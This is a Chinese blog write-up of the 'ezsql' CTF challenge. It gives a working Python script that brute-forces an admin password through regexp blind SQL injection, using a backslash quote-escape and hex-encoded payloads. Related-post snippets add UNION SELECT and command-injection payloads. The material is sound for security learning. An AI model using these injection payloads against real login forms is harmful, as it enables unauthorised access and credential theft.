[青少年CTF]ezsql

最新推荐文章于 2024-03-21 20:45:43 发布
最新推荐文章于 2024-03-21 20:45:43 发布
阅读量332 收藏 2
点赞数
分类专栏: CTF解题 #青少年CTF 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_50553973/article/details/129579970
版权

这题采用了regexp盲注

可以使用python

import requests

import string



def str2hex(string):

  result=''

  for i in string:

    result+=hex(ord(i))

  result=result.replace('0x','')

  return'0x'+result



strs=string.ascii_letters+string.digits

url="http://44d45158-6d22-4b4c-b3f0-4209335a87f7.challenge.qsnctf.com:8081/login.php"

headers= {

    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'

}

payload='or password regexp binary {}#'

if __name__=="__main__":

    name=''

    for i in range(1,40):

        for j in strs:

            passwd=str2hex('^'+name+j)

            payloads=payload.format(passwd)

            postdata={

                'username':'admin\\',

                'password':payloads

            }

            r=requests.post(url,data=postdata,headers=headers)

            if "Maybe you are right" in r.text:

                name+=j

                print(j,end='')

                break

猜测出密码后登录得到flag

flag{so_3asy_sql_1nj3cti0n}

 

明裕学长
关注
专栏目录
青少年CTF-Web-Easy PingMe攻略
小苏
11-30 956
分号字符,决定使用这个符号进行操作,经过这条命令可以得知本目录下还有一个文件名为【flag.php】,猜测flag就在该文件中,所以使用【1.1.1.1;这是因为他是php语言,且将flag赋值在了变量中,并没有将它进行输出!第二步:开始尝试注入,先测试是否会过滤一些字符之类的操作 这里以【1.1.1.1;见怪不怪了,尝试【CTRL+U】查看源代码看看是否有什么东西出现!end:遇到命令注入的可以尝试【;前言:根据题目意思得知该题目为命令执行【命令注入】第一步:启动靶场,然后打开链接查看原型。
[青少年 CTF] Robots
piggcs的博客
04-03 284
删除网址的/robots.txt 输入 /f1ag_1n_the_h3re.php 得到Flag。
ezsqli
qq_40710190的博客
09-28 460
ezsqli 根据题目的提示这是一道关于SQL注入的题,这几天恶补了一波SQL注入,记录一下解题过程 1.前景知识 MySQL数据库注入基础 报错基于GET的注入GET-Error based PHP绕过and和or过滤 先看下来吧,如果有不会的在回头来前景知识这里找好了 2.正题进入 二话不说,F12查看源码 <script type="text/javascript"> name = $_POST['name']; $password = $_POST['pw'];
青少年CTF-ezsql-题目解析
zxsctf的博客
01-07 662
username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#通过探测发现过滤了select、union、'、"、、=、like、and等。利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写。进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。题目的考点应该是本题考点为MySQL regexp盲注了。题目来源:克拉玛依市第一届网络安全技能大赛。
CTF每日练习之“ezsql“-regexp注入
LCW991207的博客
08-27 431
CTF每日练习(8月29日) "ezsql"-regexp注入
ezsql
2301_79935671的博客
03-21 346
题目靶机地址解释:第一行:目标机器 WEB 服务地址第二行:目标机器 SSH 地址以及端口第三行:Check 服务访问地址。
青少年CTF平台---sqli-labs
t235336456的博客
11-30 484
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
[青少年 CTF] Web签到
piggcs的博客
04-03 619
扫出一个备份文件/index.php.bak,在地址输入/index.php.bak。输入指令python dirsearch.py -u http://xxxx。命令行输入 python,返回版本号则安装成功(环境配置成功)。此工具是Python3工具,所以先要部署Python3环境。建议默认安装到C盘 且 勾选PATH(自动配置环境变量)。进入Python官网后找到自己想要的版本和相应的系统。自动下载一个文件,用记事本打开,得到flag。安装完成后 win+r 输入 cmd。
青少年ctf擂台挑战赛 2024 #round 1
最新发布
04-16
### 青少年CTF擂台挑战赛2024 Round 1知识点解析 #### 一、CTF概述与赛事背景 **CTF(Capture The Flag)**是一种网络安全技术比赛形式,参与者通常需要通过解决一系列安全相关的挑战来获取分数。本次青少年CTF...
青少年ctf crypto easy 部分题解
mxaii的博客
01-08 854
目前只写了我做了的,难绷
ezsql:PHP类,使与数据库的交互变得非常容易
01-30
ezsql 一个使处理数据库连接非常容易的类。 这是 ,具有许多现代编程实践,将破坏版本3的用户。 以一种主要方式破坏了版本2.1.7,它需要PHP 5.6 。 哪一个删除了mysql扩展支持,除此之外,到目前为止,使用该库没有任何变化,只有附加功能。 该库有一个Database类,它是模式与容器托管的组合。 该库现在遵循许多OOP原则,其中一项原则已删除公共访问的方法属性。 该库还遵循PSR-2,PSR-4,PSR-11约定,并且主要遵循PSR-1,这仍在进行中。 更多待办事项... 有关完整概述,请参见 ,它还没有完全完成。 安装 composer require ezsql/ezsql 用法 require 'vendor/autoload.php' ; // **** is one of mysqli, pgsql, sqlsrv, sqlite3, or Pdo. use ezsql\ Database ; $ db = Database :: initialize ( '****' , [ $ dsn_path_user , $ password , $ dat
Ezsql
weixin_46601305的博客
01-15 630
BUUCTF Ezsql
ezsql mysql_PHP_ezSQL PHP数据库操作类库,ezSQL 下载地址: 下载 : ezSQL 新 - phpStudy
weixin_34827430的博客
02-01 636
ezSQL PHP数据库操作类库ezSQL 下载地址:下载 : ezSQL新版本是2.05添加了很多支持,包括 CodeIgniter,MSSQL, PDO 等等我之前也为 CodeIgniter 写过一次,不过只支持 MySQL看看使用示例其实也没什么难度,直接看源代码即可,主要是程序设计的思想很好。Example 1---------------------------------------...
ezsqli(GYCTF-WEB)
火柴人的博客
03-13 945
1.知识点 SQL盲注: 布尔盲注 无列名盲注 2.分析 题目过滤了or和union,无法使用Information_Schema.Tables。 之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。 但是我们首先需要查找flag所在的表名,这里我们参考 Alternatives to Extract Tables and Columns ...
[CTF] BUUCTF系统加固题 → Ezsql
ZXW_NUDT的博客
12-09 5853
小声说:这可能是全网唯一一个Writeup 接下来讲讲具体咋做 第一步:肯定是用KALI上ssh登一下 然后找到index.php这个文件 接着查看文件里面的内容,最好是复制到VSCode上改完再粘贴回去 index.php文件内容如下: <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible"
ezSQL - 快速、灵活的 SQL 编辑器
gitblog_00087的博客
03-18 470
ezSQL - 快速、灵活的 SQL 编辑器 ezSQL 是一个轻量级但功能强大的 SQL 编辑器,旨在帮助开发人员更轻松地编写和管理他们的 SQL 查询。无论您是数据库管理员还是开发者,都可以利用 ezSQL 的各种特性提高您的工作效率。 主要特点 跨平台支持 - 支持 Windows, macOS 和 Linux 操作系统。 简洁易用的界面 - 易于理解的布局和直观的操作方式让您可以快速上手...
青少年CTF——BabySQLi——Writeup
Amazingsuger的博客
01-19 560
青少年CTF——BabySQLi——WriteUp
[GYCTF2020]Ezsqli
shinygod的博客
04-11 576
知识点:无列名注入 id=1^(length(database())>1)^1 说明这里可以用布尔盲注。 接下来就是三爆了,但是这边把information过滤了,可以用sys.x$schema_flattened_keys绕过。 import requests url = "http://2270547b-9645-4b8f-ace8-e09ed89ae3d2.node4.buuoj.cn:81/index.php" name = "" dic = "qwertyuioplkjhgfdsa
2021-10-10 buuctf Ezsqli
shallowskyandsea的博客
10-10 486
Ezsqli 打开题目,有输入框,题目名提示是sql注入 输入1 输入2 输入3 先看看过滤 用字典跑跑 (字典有限就跑出来这几个过滤) 可以看到一个关键的information被过滤了 试试无列名注入 这里要用到sys库 schema_table_statistics_with_buffer和x$schema_table_statistics_with_buffer可以 代替information.schema帮我们找到表名 借用隔壁的脚本 ..
青少年ctf shellcode
03-15
青少年CTF(Capture The Flag)是一种网络安全竞赛,旨在培养年轻人的网络安全技能和解决问题的能力。Shellcode是一段用于利用计算机系统漏洞的机器码,通常用于执行特定的操作或获取系统权限。在青少年CTF中,学习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明裕学长

打赏私我进交流群

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值